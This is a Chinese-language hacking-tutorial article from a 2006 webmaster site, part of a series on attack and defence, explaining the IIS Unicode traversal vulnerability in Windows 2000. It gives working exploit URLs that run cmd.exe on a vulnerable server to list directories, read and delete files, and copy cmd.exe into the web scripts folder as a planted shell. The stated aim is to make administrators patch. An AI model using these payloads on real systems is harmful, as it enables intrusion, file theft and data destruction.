中国站长下载-为中国站长提供最好最全的建站资源! 首 页发布资源有事留言繁體中文
设为首页
加入收藏
联系我们
 
全站首页 站长下载 站长学院 站长博客 连接市场 站长交易 赚钱联盟 站长工具 站长网址 站长论坛
 软件: ASP 源码 | .NET源码 | PHP 源码 | JSP 源码 | CGI 源码 | 网页模板 | 网页素材 | 字体下载 | 工具软件 | 服务器类 | 书籍教程
 文章: 网页编程 | 网页制作 | 数据库区 | 服务器区 | 网络安全 | 网站运营 | 图形图象
您当前的位置:中国站长下载 -> 文章中心 -> 网络安全 -> 基础知识 -> 文章内容  虚拟主机 域名注册 退出登录 用户管理
栏目导航
· 基础知识 · 安全防范
· 防 火 墙 · 其他相关
热门文章
· sndvol32 - sndvol3...
· [组图] FLASH:《大话李白》...
· 个人网站到底能赚多...
· [图文] Rundll.exe是病毒吗...
· [组图] Flash:制作MV
· 价值12万元的网站SE...
· 网站创业者,你需要...
· 一个成功的网站设计...
· [图文] FLASH:韩国导航条解...
· 中国网站的赚钱模式...
相关文章
· [图文] FlashMX 视频教程(1...
· 中国黑客超强X档案 ...
· 网络孙子兵法!黑客...
· 用php实现gb2312和u...
· 用php实现gb2312和u...
· 为ASP.NET控件添加设...
· Asp.net把UTF-8编码...
· 将输入的20041219等...
· 亲密接触ASP.Net(12...
· 价值12万元的网站SE...
黑客攻防技术内幕-防止入侵的方法(12)
作者:风未起时  来源:中国站长学院  发布时间:2006-5-19 14:32:30  发布人:chinazhan

 减小字体 增大字体

6.9 UNICODE漏洞入侵(1)

    

6.9  UNICODE漏洞入侵

风光了很久的UNICODE漏洞是经常被入侵者利用的漏洞之一。在200151日大战中,黑客们就普遍利用此漏洞对各国网站进行攻击,究其原因:一是由于此漏洞刚公布不久,二是网络安全管理员安全意识低下,对UNICODE漏洞不进行及时的修补,使入侵者通过UNICODE漏洞入侵网站得逞。

但是现在网上还有很多服务器还存在着UNICODE漏洞,此漏洞可以使一般稍懂计算机的人直接通过浏览器,向存有漏洞的服务器发送请求,就可以入侵存有UNICODE漏洞的服务器。

接下来将全面讲述入侵者是如何利用此漏洞对网站进行入侵,也希望可以引起管理员们的安全意识,尽快对UNICODE漏洞进行修补(修补方法请读阅3.7.1 节中UNICODE漏洞的修补)

6.9.1  用于UNICODE漏洞入侵的命令

下面以中文版Windows 2000为例,对于其他版本只需更改其编码即可,参阅3.7.1 节中UNICODE漏洞的修补。

首先将介绍入侵者在入侵存在UNICODE漏洞的服务器时所涉及到的有关命令,其实有些命令和在DOS下使用的命令是一样的,但如CD这一类命令则不可用。

1. dir命令

列出目标计算机的目录。在浏览器的地址栏中输入如下内容:

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+d:\

或者

http://127.0.0.1/scripts /..%c0%2f../ winnt/system32/cmd.exe?/c+dir+d:\

以上内容是使用dir命令,让存在UNICODE漏洞的服务器列出d盘的目录,如图6-65所示。

6-65  使用dir命令,列出d盘的目录

2. 显示下一个目录

这里不使用CD命令 ,而是直接输入路径。如果进入d盘下的Inetpub文件,可在浏览器的地址栏中输入如下内容:

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+d:\Inetpub

或者:

http://127.0.0.1/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir+d:\Inetpub

如图6-66所示。

6-66  进入d盘下的Inetpub文件

3. type命令

显示文件内容 。可以在浏览器中显示txt htm asp等格式的内容,如要显示d盘下config.txt文件的内容,可在浏览器的地址栏中输入如下内容:

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+type +d:\config.txt 

或者:

http://127.0.0.1/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+type +d:\config.txt

如图6-67所示。

6-67  使用type命令显示config.txt的内容

4. del命令

删除文件命令。例如,要删除d盘下的config.txt文件,可在浏览器的地址栏中输入如下内容:

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+del +d:\config.txt 

或者:

http://127.0.0.1/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+del +d:\config.txt 

如图6-68所示。

6-68  使用del命令删除d盘下config.txt文件

5. copy命令

复制指定文件或同时将该文件改名,例如将dWinnt\system32下的cmd.exe程序复制到dInetpub\scripts下,并改名为win.exe,可在浏览器的地址栏中输入如下内容:

http://127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+d:\winnt\system32\cm d.exe d:\inetpub\scripts\win.exe

或者:

http://127.0.0.1/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+copy+d:\winnt\system32\cm   d.exe d:\inetpub\scripts\win.exe

如图6-696-70所示。

6-69  改名为win.execmd.exe程序

6-70  复制cmd.exe程序

从图6-69中可以看到,dWinnt\system32下的cmd.exe程序成功地复制到dInetpub\scripts下并改名为win.exe


 
[] [返回上一页] [打 印] [收 藏]
∷相关文章评论∷    (评论内容只代表网友观点,与本站立场无关!) [更多评论...]
中国站长下载
中国站长下载

 本页只接受PR>=4 IT类站点连接,申请连接,谢谢您们的支持!希望我们的下载站能够真正帮到中国的站长们!
关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图
Copyright © 2005-2006 ChinaZhan.Net. All Rights Reserved .